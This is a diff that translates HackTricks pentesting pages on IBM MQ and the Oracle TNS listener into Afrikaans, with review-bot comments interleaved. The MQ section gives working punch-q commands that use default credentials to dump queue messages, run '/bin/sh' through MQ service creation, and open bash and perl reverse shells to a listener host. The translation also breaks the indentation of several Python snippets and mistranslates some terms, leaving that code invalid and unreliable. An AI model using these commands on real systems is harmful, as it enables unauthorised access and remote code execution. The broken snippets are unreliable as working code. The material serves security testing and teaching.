Laai IBM MQ-biblioteke af vanaf [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). Vir Linux x86_64 is dit **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**. +3. Ontplooi (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`). +4. Voer `sudo ./mqlicense.sh` uit om lisensievoorwaardes te aanvaar. ->If you are under Kali Linux, modify the file `mqlicense.sh`: remove/comment the following lines (between lines 105-110): +>As jy onder Kali Linux is, wysig die lêer `mqlicense.sh`: verwyder/kommentaar die volgende lyne (tussen lyne 105-110): > >```bash ->if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ] -> then +>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ] +> then > echo "ERROR: This package is incompatible with this system" > echo " This package was built for ${BUILD_PLATFORM}" > exit 1 >fi >``` -5. Install these packages: - +5. Installeer hierdie pakkette: ```bash sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm ``` +6. Voeg dan tijdelik die `.so` lêers by LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **voordat** jy ander gereedskap gebruik wat van hierdie afhanklikhede gebruik maak. -6. 
Then, temporary add the `.so` files to LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **before** running other tools using these dependencies. +Dan kan jy die projek [**pymqi**](https://github.com/dsuch/pymqi) kloon: dit bevat interessante kodefragmente, konstantes, ... Of jy kan die biblioteek direk installeer met: `pip install pymqi`. -Then, you can clone the project [**pymqi**](https://github.com/dsuch/pymqi): it contains interesting code snippets, constants, ... Or you can directly install the library with: `pip install pymqi`. +### Gebruik van punch-q -### Using punch-q +#### Met Docker -#### With Docker +Gebruik eenvoudig: `sudo docker run --rm -ti leonjza/punch-q`. -Simply use: `sudo docker run --rm -ti leonjza/punch-q`. +#### Sonder Docker -#### Without Docker +Kloon die projek [**punch-q**](https://github.com/sensepost/punch-q) en volg dan die leesmy vir installasie (`pip install -r requirements.txt && python3 setup.py install`). -Clone the project [**punch-q**](https://github.com/sensepost/punch-q) then follow the readme for installation (`pip install -r requirements.txt && python3 setup.py install`). +Daarna kan dit gebruik word met die `punch-q` opdrag. -After, it can be used with `punch-q` command. +## Enumerasie -## Enumeration +Jy kan probeer om die **queue bestuurder naam, die gebruikers, die kanale en die rye** te enumereer met **punch-q** of **pymqi**. -You can try to enumerate the **queue manager name, the users, the channels and the queues** with **punch-q** or **pymqi**. - -### Queue Manager - -Sometimes, there is no protection against getting the Queue Manager name: +### Queue Bestuurder +Soms is daar geen beskerming teen die verkryging van die Queue Bestuurder naam nie: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name Queue Manager name: MYQUEUEMGR ``` +### Kanale -### Channels - -**punch-q** is using an internal (modifiable) wordlist to find existing channels. 
Usage example: - +**punch-q** maak gebruik van 'n interne (veranderbare) woordelys om bestaande kanale te vind. Gebruik voorbeeld: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels "DEV.ADMIN.SVRCONN" exists and was authorised. "SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised. "SYSTEM.DEF.SVRCONN" might exist, but user was not authorised. ``` +Dit gebeur dat sommige IBM MQ-instanties **ongeagte** MQ-versoeke aanvaar, so `--username / --password` is nie nodig nie. Natuurlik kan toegangsregte ook verskil. -It happens that some IBM MQ instances accept **unauthenticated** MQ requests, so `--username / --password` is not needed. Of course, access rights can also vary. - -As soon as we get one channel name (here: `DEV.ADMIN.SVRCONN`), we can enumerate all other channels. - -The enumeration can basically be done with this code snippet `code/examples/dis_channels.py` from **pymqi**: +Sodra ons een kanaalnaam kry (hier: `DEV.ADMIN.SVRCONN`), kan ons al die ander kanale opnoem. +Die opnoeming kan basies gedoen word met hierdie kodefragment `code/examples/dis_channels.py` van **pymqi**: ```python import logging import pymqi 
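Review bot: two wording slips in the translated install steps of this hunk: step 6 reads `+6. Voeg dan tijdelik die .so lêers by LD` with the Dutch spelling `tijdelik`, which in Afrikaans is `tydelik`; and step 3 renders "Decompress" as `+3. Ontplooi (...)`, which means deploy/unfold, where `Pak uit` matches the `tar xvzf` command it describes. The hunk also drops the blank line that separated list items and sentences from the fence that follows them (`+5. Installeer hierdie pakkette:` now sits directly on the ```bash line); keep those blank lines as in the English source so the Markdown renders identically. Finally, the heading `+### Queue Bestuurder` leaves one noun untranslated while the same hunk translates "queues" as `Rye`; pick one term for queue manager and use it consistently through the file.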
@@ -126,24 +119,22 @@ qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password) pcf = pymqi.PCFExecute(qmgr) try: - response = pcf.MQCMD_INQUIRE_CHANNEL(args) +response = pcf.MQCMD_INQUIRE_CHANNEL(args) except pymqi.MQMIError as e: - if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME: - logging.info('No channels matched prefix `%s`' % prefix) - else: - raise +if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME: +logging.info('No channels matched prefix `%s`' % prefix) else: - for channel_info in response: - channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME] - logging.info('Found channel `%s`' % channel_name) +raise +else: +for channel_info in response: +channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME] +logging.info('Found channel `%s`' % channel_name) qmgr.disconnect() ``` - -... But **punch-q** also embed that part (with more infos!). -It can be launch with: - +... Maar **punch-q** bevat ook daardie deel (met meer inligting!). +Dit kan geloods word met: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*' Showing channels with prefix: "*"... 
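Review bot: the translated Python in this hunk lost its indentation and is no longer valid Python: `try:` is now followed by the flush-left `+response = pcf.MQCMD_INQUIRE_CHANNEL(args)`, and the bodies of the `if`/`else` inside `except pymqi.MQMIError as e:` (`+logging.info('No channels matched prefix `%s`' % prefix)`, `+raise`) as well as the `for channel_info in response:` loop are flush left too, so the snippet fails with an IndentationError before it ever connects. A translation commit should change prose only; restore the indentation the removed `-` lines directly above show and leave the code bytes untouched.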
@@ -164,13 +155,11 @@ Showing channels with prefix: "*"... | SYSTEM.DEF.SVRCONN | Server-connection | | | | | | | SYSTEM.DEF.CLNTCONN | Client-connection | | | | | | ``` +### Rye -### Queues - -There is a code snippet with **pymqi** (`dis_queues.py`) but **punch-q** permits to retrieve more pieces of info about the queues: - +Daar is 'n kodefragment met **pymqi** (`dis_queues.py`), maar **punch-q** maak dit moontlik om meer inligting oor die rye te bekom: ```bash - ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*' +❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*' Showing queues with prefix: "*"... | Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description | | | | | | | GR Name | eue Nam | | @@ -190,13 +179,11 @@ Showing queues with prefix: "*"... | 9 | | | | | | | | # Truncated ``` +## Uitbuiting -## Exploit - -### Dump messages - -You can target queue(s)/channel(s) to sniff out / dump messages from them (non-destructive operation). *Examples:* +### Stort boodskappe +Jy kan 'n teiken(s)/kanaal(s) aanval om boodskappe daaruit te snuffel / stort (nie-destruktiewe operasie). *Voorbeelde:* ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff ``` 
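Review bot: `+Jy kan 'n teiken(s)/kanaal(s) aanval om boodskappe daaruit te snuffel / stort` mistranslates `You can target queue(s)/channel(s) to sniff out / dump messages`: the verb "target" has become the noun `teiken`, and "queue(s)" disappeared, so the reader is told to attack "target(s)/channel(s)" instead of choosing which queues or channels to read from. Suggest `Jy kan ry(e)/kanaal(kanale) teiken om boodskappe daaruit te snuffel / te stort (nie-destruktiewe bewerking)`, reusing `Rye`, the word this hunk's own heading `+### Rye` uses for queues.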
@@ -204,40 +191,36 @@ You can target queue(s)/channel(s) to sniff out / dump messages from them (non-d ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump ``` +**Moenie huiwer om op alle geïdentifiseerde toue te itereer nie.** -**Do not hesitate to iterate on all identified queues.** +### Kode-uitvoering -### Code execution - -> Some details before continuing: IBM MQ can be controlled though multiple ways: MQSC, PCF, Control Command. Some general lists can be found in [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison). -> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmable Command Formats***) is what we are focused on to interact remotely with the instance. **punch-q** and furthermore **pymqi** are based on PCF interactions. -> -> You can find a list of PCF commands: -> * [From PCF documentation](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), and -> * [from constants](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes). -> -> One interesting command is `MQCMD_CREATE_SERVICE` and its documentation is available [here](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). It takes as argument a `StartCommand` pointing to a local program on the instance (example: `/bin/sh`). +> 'n Paar besonderhede voordat ons voortgaan: IBM MQ kan op verskeie maniere beheer word: MQSC, PCF, Beheeropdrag. 'n Paar algemene lysies kan gevind word in die [IBM MQ-dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison). 
+> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmable Command Formats***) is waarop ons fokus om op afstand met die instansie te kommunikeer. **punch-q** en verder **pymqi** is gebaseer op PCF-interaksies. > -> There is also a warning of the command in the docs: *"Attention: This command allows a user to run an arbitrary command with mqm authority. If granted rights to use this command, a malicious or careless user could define a service which damages your systems or data, for example, by deleting essential files."* -> -> *Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here.* +> Jy kan 'n lys van PCF-opdragte vind: +> * [Vanaf die PCF-dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), en +> * [vanaf konstantes](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes). +> +> Een interessante opdrag is `MQCMD_CREATE_SERVICE` en die dokumentasie is beskikbaar [hier](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). Dit neem 'n `StartCommand` as argument wat verwys na 'n plaaslike program op die instansie (voorbeeld: `/bin/sh`). +> +> Daar is ook 'n waarskuwing oor die opdrag in die dokumentasie: *"Aandag: Hierdie opdrag stel 'n gebruiker in staat om 'n willekeurige opdrag met mqm-bevoegdheid uit te voer. 
As regte verleen word om hierdie opdrag te gebruik, kan 'n kwaadwillige of sorgelose gebruiker 'n diens definieer wat jou stelsels of data beskadig, byvoorbeeld deur noodsaaklike lêers te verwyder."* +> +> *Let wel: altyd volgens die IBM MQ-dokumentasie (Administrasie Verwysing), is daar ook 'n HTTP-eindpunt by `/admin/action/qmgr/{qmgrName}/mqsc` om die ekwivalente MQSC-opdrag vir diensskepping (`DEFINE SERVICE`) uit te voer. Hierdie aspek word nog nie hier gedek nie.* -The service creation / deletion with PCF for remote program execution can be done by **punch-q**: - -**Example 1** +Die skepping / verwydering van 'n diens met PCF vir uitvoering van 'n program op afstand kan gedoen word deur **punch-q**: +**Voorbeeld 1** ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id" ``` - -> In the logs of IBM MQ, you can read the command is successfully executed: -> +> In die logboeke van IBM MQ kan jy lees dat die opdrag suksesvol uitgevoer is: +> > ```bash -> 2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)] +> 2023-10-10T19:13:01.713Z AMQ5030I: Die opdrag '808544aa7fc94c48' het begin. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)] > ``` -You can also enumerate existing programs on the machine (here `/bin/doesnotexist` ... does not exist): - +Jy kan ook bestaande programme op die rekenaar opnoem (hier `/bin/doesnotexist` ... bestaan nie): ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg s "whatever" 
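Review bot: the quoted IBM MQ log line in this hunk was translated: `+> 2023-10-10T19:13:01.713Z AMQ5030I: Die opdrag '808544aa7fc94c48' het begin.` replaces the literal `AMQ5030I: The Command '808544aa7fc94c48' has started.` that the product actually writes. Program output inside a code fence must stay verbatim, since the English message is what an operator searches for in the queue manager's logs when checking whether a service was defined and started; restore the wording of the removed `-` line and translate only the sentence that introduces it (`+> In die logboeke van IBM MQ kan jy lees ...`), which is fine as is.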
@@ -252,36 +235,30 @@ Giving the service 0 second(s) to live... Cleaning up service... Done ``` +**Wees bewus dat die program-lancering asinkronies is. Jy het dus 'n tweede item nodig om die uitbuiting te benut** ***(luisteraar vir omgekeerde dop, lêer-skepping op verskillende diens, data-eksfiltrering deur middel van netwerk ...)*** -**Be aware that the program launch is asynchronous. So you need a second item to leverage the exploit** ***(listener for reverse shell, file creation on different service, data exfiltration through network ...)*** +**Voorbeeld 2** -**Example 2** +Vir 'n maklike omgekeerde dop, bied **punch-q** ook twee omgekeerde dop-ladinge aan: -For easy reverse shell, **punch-q** proposes also two reverse shell payloads : +* Een met bash +* Een met perl -* One with bash -* One with perl - -*Of course you can build a custom one with the `execute` command.* - -For bash: +*Natuurlik kan jy 'n aangepaste een bou met die `uitvoer`-opdrag.* +Vir bash: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444 ``` - -For perl: - +Vir perl: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444 ``` +### Aangepaste PCF -### Custom PCF - -You can dig into the IBM MQ documentation and directly use **pymqi** python library to test specific PCF command not implemented in **punch-q**. - -**Example:** +Jy kan in die IBM MQ-dokumentasie duik en direk die **pymqi** Python-biblioteek gebruik om 'n spesifieke PCF-opdrag te toets wat nie geïmplementeer is in **punch-q** nie. +**Voorbeeld:** ```python import pymqi 
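Review bot: `+*Natuurlik kan jy 'n aangepaste een bou met die `uitvoer`-opdrag.*` translates a literal punch-q subcommand: the tool's subcommand is `execute` (see `command execute --cmd` in the fences just above), so `uitvoer` in backticks names something that does not exist; keep identifiers inside backticks untranslated (`die execute-opdrag`). Terminology also drifts within this file: queues are `Rye` in the section heading but `toue` in `+**Moenie huiwer om op alle geïdentifiseerde toue te itereer nie.**`; settle on one word.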
@@ -297,26 +274,25 @@ qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password) pcf = pymqi.PCFExecute(qmgr) try: - # Replace here with your custom PCF args and command - # The constants can be found in pymqi/code/pymqi/CMQCFC.py - args = {pymqi.CMQCFC.xxxxx: "value"} - response = pcf.MQCMD_CUSTOM_COMMAND(args) +# Replace here with your custom PCF args and command +# The constants can be found in pymqi/code/pymqi/CMQCFC.py +args = {pymqi.CMQCFC.xxxxx: "value"} +response = pcf.MQCMD_CUSTOM_COMMAND(args) except pymqi.MQMIError as e: - print("Error") +print("Error") else: - # Process response +# Process response qmgr.disconnect() ``` +As jy nie die konstante name kan vind nie, kan jy verwys na die [IBM MQ-dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors). -If you cannot find the constant names, you can refer to the [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors). - -> *Example for [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Decimal = 73). It needs the parameter `MQCA_CLUSTER_NAME` (Decimal = 2029) which can be `*` (Doc: ):* -> +> *Voorbeeld vir [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Desimaal = 73). Dit vereis die parameter `MQCA_CLUSTER_NAME` (Desimaal = 2029) wat `*` kan wees (Doc: ):* +> > ```python > import pymqi -> +> > queue_manager = 'MYQUEUEMGR' > channel = 'DEV.ADMIN.SVRCONN' > host = '172.17.0.2' @@ -324,10 +300,10 @@ If you cannot find the constant names, you can refer to the [IBM MQ documentatio > conn_info = '%s(%s)' % (host, port) > user = 'admin' > password = 'passw0rd' -> +> > qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password) > pcf = pymqi.PCFExecute(qmgr) -> +> > try: > args = {2029: "*"} > response = pcf.MQCMD_REFRESH_CLUSTER(args) 
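Review bot: as in the channel-enumeration snippet earlier, the custom-PCF example in the `@@ -297,26 +274,25 @@` hunk was de-indented: `+args = {pymqi.CMQCFC.xxxxx: "value"}` and `+response = pcf.MQCMD_CUSTOM_COMMAND(args)` now sit flush left under `try:`, and `+print("Error")` under `except pymqi.MQMIError as e:`, which is a syntax error. Restore the indentation of the removed `-` lines and keep fenced code out of the translation pass. Separately (pre-existing, visible in the context lines): the `else:` branch holds only the comment `# Process response` before the top-level `qmgr.disconnect()`, so even with indentation restored Python reports an expected indented block there; a `pass` or the actual response handling is needed.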
@@ -335,37 +311,33 @@ If you cannot find the constant names, you can refer to the [IBM MQ documentatio > print("Error") > else: > print(response) -> +> > qmgr.disconnect() > ``` -## Testing environment +## Toetsomgewing -If you want to test the IBM MQ behavior and exploits, you can set up a local environment based on Docker: - -1. Having an account on ibm.com and cloud.ibm.com. -2. Create a containerized IBM MQ with: +As jy die IBM MQ-gedrag en aanvalle wil toets, kan jy 'n plaaslike omgewing opstel gebaseer op Docker: +1. Skep 'n rekening op ibm.com en cloud.ibm.com. +2. Skep 'n gekonteneerde IBM MQ met: ```bash sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2 sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2 ``` +Standaard is die verifikasie geaktiveer, die gebruikersnaam is `admin` en die wagwoord is `passw0rd` (Omgewingsveranderlike `MQ_ADMIN_PASSWORD`). +Hier is die wagkamer se naam ingestel op `MYQUEUEMGR` (veranderlike `MQ_QMGR_NAME`). -By default, the authentication is enabled, the username is `admin` and the password is `passw0rd` (Environment variable `MQ_ADMIN_PASSWORD`). -Here, the queue manager name has been set to `MYQUEUEMGR` (variable `MQ_QMGR_NAME`). - -You should have the IBM MQ up and running with its ports exposed: - +Jy moet IBM MQ aan die gang hê met sy poorte blootgestel: ```bash ❯ sudo docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq ``` +> Die ou weergawe van IBM MQ docker-beelde is beskikbaar by: https://hub.docker.com/r/ibmcom/mq/. -> The old version of IBM MQ docker images are at: https://hub.docker.com/r/ibmcom/mq/. 
+## Verwysings -## References - -* [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec) +* [mgeeky se gist - "Praktiese IBM MQ Penetration Testing notas"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec) * [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf) -* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq) +* [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq) diff --git a/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md index 0d4bc7fc2..7318a5bda 100644 --- a/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md +++ b/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md @@ -1,89 +1,85 @@ -# 1521,1522-1529 - Pentesting Oracle TNS Listener +# 1521,1522-1529 - Pentesting Oracle TNS Luisteraar
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from [here](https://www.techopedia.com/definition/8711/oracle-database)). - -When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522–1529-). +Oracle-databasis (Oracle DB) is 'n relasionele databasisbestuurstelsel (RDBMS) van die Oracle Corporation (van [hier](https://www.techopedia.com/definition/8711/oracle-database)). +Wanneer jy Oracle ondersoek, is die eerste stap om met die TNS-luisteraar te praat wat gewoonlik op die verstekpoort (1521/TCP) is (jy kan ook sekondêre luisteraars op 1522-1529 kry). ``` 1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows) 1748/tcp open oracle-tns Oracle TNS Listener ``` +## Opsomming -## Summary +1. **Weergawe-opsomming**: Identifiseer weergaweinligting om na bekende kwesbaarhede te soek. +2. **TNS Listener Bruteforce**: Soms nodig om kommunikasie tot stand te bring. +3. **SID Naam Opsomming/Bruteforce**: Ontdek databasisname (SID). +4. **Legitimasie Bruteforce**: Probeer toegang verkry tot ontdekte SID. +5. **Kode-uitvoering**: Probeer kode op die stelsel uitvoer. -1. **Version Enumeration**: Identify version information to search for known vulnerabilities. -2. **TNS Listener Bruteforce**: Sometimes necessary to establish communication. -3. **SID Name Enumeration/Bruteforce**: Discover database names (SID). -4. **Credential Bruteforce**: Attempt to access discovered SID. -5. **Code Execution**: Attempt to run code on the system. 
+Om die MSF-orakelmodules te gebruik, moet u sekere afhanklikhede installeer: [**Installasie**](oracle-pentesting-requirements-installation.md) -In order to user MSF oracle modules you need to install some dependencies: [**Installation**](oracle-pentesting-requirements-installation.md) +## Plasings -## Posts - -Check these posts: +Kyk na hierdie plasings: * [https://secybr.com/posts/oracle-pentesting-best-practices/](https://secybr.com/posts/oracle-pentesting-best-practices/) * [https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573) * [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/) * [http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html](http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html) -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Oracle #Protocol Abbreviation if there is one. Port_Number: 1521 #Comma separated if there is more than one. 
Protocol_Description: Oracle TNS Listener #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for Oracle - Note: | - Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation +Name: Notes +Description: Notes for Oracle +Note: | +Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation - #great oracle enumeration tool - navigate to https://github.com/quentinhardy/odat/releases/ - download the latest - tar -xvf odat-linux-libc2.12-x86_64.tar.gz - cd odat-libc2.12-x86_64/ - ./odat-libc2.12-x86_64 all -s 10.10.10.82 +#great oracle enumeration tool +navigate to https://github.com/quentinhardy/odat/releases/ +download the latest +tar -xvf odat-linux-libc2.12-x86_64.tar.gz +cd odat-libc2.12-x86_64/ +./odat-libc2.12-x86_64 all -s 10.10.10.82 - for more details check https://github.com/quentinhardy/odat/wiki +for more details check https://github.com/quentinhardy/odat/wiki - https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener +https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener Entry_2: - Name: Nmap - Description: Nmap with Oracle Scripts - Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP} +Name: Nmap +Description: Nmap with Oracle Scripts +Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP} ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
